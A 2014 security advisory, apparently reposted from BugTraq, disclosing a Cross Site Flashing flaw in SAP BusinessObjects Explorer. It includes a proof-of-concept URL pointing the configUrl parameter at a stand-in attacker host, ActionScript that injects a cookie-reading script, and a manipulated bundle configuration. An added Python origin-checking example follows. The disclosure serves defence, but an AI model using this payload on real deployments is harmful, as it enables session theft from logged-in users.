BugTraq
SAP Security Note 1908647 - Cross Site Flashing in BusinessObjects Explorer Oct 10 2014 05:37AM
Alexandre Herzog (alexandre herzog csnc ch)
#######################################################################
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#######################################################################
#
# Product: BusinessObjects Explorer
# Vendor: SAP AG
# Subject: Cross Site Flashing
# Risk: High
# Effect: Remotely exploitable
# Author: Stefan Horlacher
# Date: 2014-10-10
# SAP Security Note: 1908647 [0]
#
#######################################################################

Abstract:
-------------
BusinessObjects Explorer is vulnerable to Cross Site Flashing [1]
attacks, allowing an attacker to, for example, steal the victim's session.
The vulnerability requires the victim to click on a malicious link
prepared by the attacker.

Affected:
---------
Vulnerable:
SAP BusinessObjects Explorer version 14.0.5 (build 882)

Not tested:
Other versions of BusinessObjects Explorer

Technical Description:
----------------------
The Flash file suffers from a Cross Site Flashing vulnerability. It
is possible to directly load and display the
com_businessobjects_polestar_bootstrap.swf Flash file and to specify a
configUrl. This requires the victim to be logged in, and the attacker
needs to know the /webres/ URL, which is known as soon as the attacker
is in possession of valid credentials. The configuration file specified
in the configUrl parameter may reside on a foreign host. The
configuration file itself may contain URLs of further Flash files
residing on a foreign domain. If successful, the victim loads foreign
Flash files, which leads to Cross Site Flashing. The example below
loads a Flash file which injects JavaScript into the DOM of the
originating domain.

URL: /explorer/webres/[CUT BY COMPASS]/com_businessobjects_polestar_bootstrap.swf?configUrl=http://example.com/attacker_flash_config.xml

Code of the injected Flash file referenced in http://example.com/attacker_flash_config.xml:
package
{
    import flash.display.Sprite;
    import flash.events.Event;
    import flash.external.ExternalInterface;

    public class Main extends Sprite
    {
        public function Main():void
        {
            ExternalInterface.call("document.write",
                "<script>alert(document.cookie)</script>");
        }
    }
}

Extract of the manipulated configuration file http://example.com/attacker_flash_config.xml:
<p:configuration xmlns:p="http://www.businessobjects.com/2007/platform"
                 p:codebase="plugins/">
  <p:splashLocation p:id="com_businessobjects_polestar_splashscreen"
                    p:codebase="http://[CUT BY COMPASS].csnc.ch/[CUT BY COMPASS]/"/>
  <p:bundles>
    <p:bundle p:id="com_businessobjects_polestar_admin" p:codebase="http://example.com/"/>
    <p:bundle p:id="com_businessobjects_polestar_prompts" p:codebase="http://example.com/"/>
    <p:bundle p:id="com_businessobjects_polestar_dataprovider_xl" p:codebase="http://example.com/"/>
    <p:bundle p:id="com_businessobjects_polestar_portal_logoff" p:codebase="http://example.com/"/>
    [CUT BY COMPASS]
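As an added example (not part of the advisory and not SAP's code), the following Python check models the origin restriction the bootstrap loader is missing here: the configUrl and every p:codebase the configuration names must resolve to the application's own origin. The namespace and element names are taken from the configuration extract above; the application origin, the sample configuration and the rule that relative codebases resolve against the configuration file's URL are assumptions.

```python
"""Added example, not code from the advisory or from SAP: an origin allow-list
check of the kind a bootstrap loader should apply before fetching a configUrl
and the bundles the configuration names. The namespace and element names
follow the advisory's extract; the sample configuration is constructed."""
import xml.etree.ElementTree as ET
from urllib.parse import urljoin, urlsplit

NS = "http://www.businessobjects.com/2007/platform"

def same_origin(url, origin):
    """True when url shares scheme, host and port with the origin URL."""
    a, b = urlsplit(url), urlsplit(origin)
    return (a.scheme, a.hostname, a.port) == (b.scheme, b.hostname, b.port)

def foreign_codebases(app_origin, config_url, config_xml):
    """Return every URL the loader would fetch from a foreign origin.

    config_url is the raw configUrl parameter, resolved against the
    application origin. Relative p:codebase values are resolved against
    the configuration file's own URL (an assumption about the loader), so
    a foreign configUrl also turns relative codebases into foreign fetches.
    """
    bad = []
    cfg = urljoin(app_origin, config_url)
    if not same_origin(cfg, app_origin):
        bad.append(cfg)
    for el in ET.fromstring(config_xml).iter():  # the root carries a codebase too
        codebase = el.get("{%s}codebase" % NS)
        if codebase is not None:
            target = urljoin(cfg, codebase)
            if not same_origin(target, app_origin):
                bad.append(target)
    return bad

APP_ORIGIN = "https://bi.example.internal/"  # constructed application origin

# Constructed configuration modelled on the advisory's extract: two bundles
# point at a foreign host, the splash screen and one bundle stay relative.
SAMPLE_CONFIG = """<p:configuration xmlns:p="%s" p:codebase="plugins/">
  <p:splashLocation p:id="com_businessobjects_polestar_splashscreen" p:codebase="plugins/"/>
  <p:bundles>
    <p:bundle p:id="com_businessobjects_polestar_admin" p:codebase="http://example.com/"/>
    <p:bundle p:id="com_businessobjects_polestar_prompts" p:codebase="http://example.com/"/>
    <p:bundle p:id="com_businessobjects_polestar_portal_logoff" p:codebase="plugins/"/>
  </p:bundles>
</p:configuration>""" % NS

if __name__ == "__main__":
    print(foreign_codebases(APP_ORIGIN, "http://example.com/attacker_flash_config.xml", SAMPLE_CONFIG))
```

With a same-origin configUrl only the two absolute foreign bundles are reported; with the advisory's foreign configUrl every codebase, including the relative ones, resolves to the foreign host and is reported.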

Timeline:
---------
2013-06-06: Discovery by Stefan Horlacher
2013-06-26: Initial vendor notification
2013-12-10: Vendor releases patch and SAP Security Note 1908647
2014-10-10: Disclosure of the advisory

References:
-----------
[0] https://service.sap.com/sap/support/notes/1908647
[1] https://www.owasp.org/index.php/Category:OWASP_Flash_Security_Project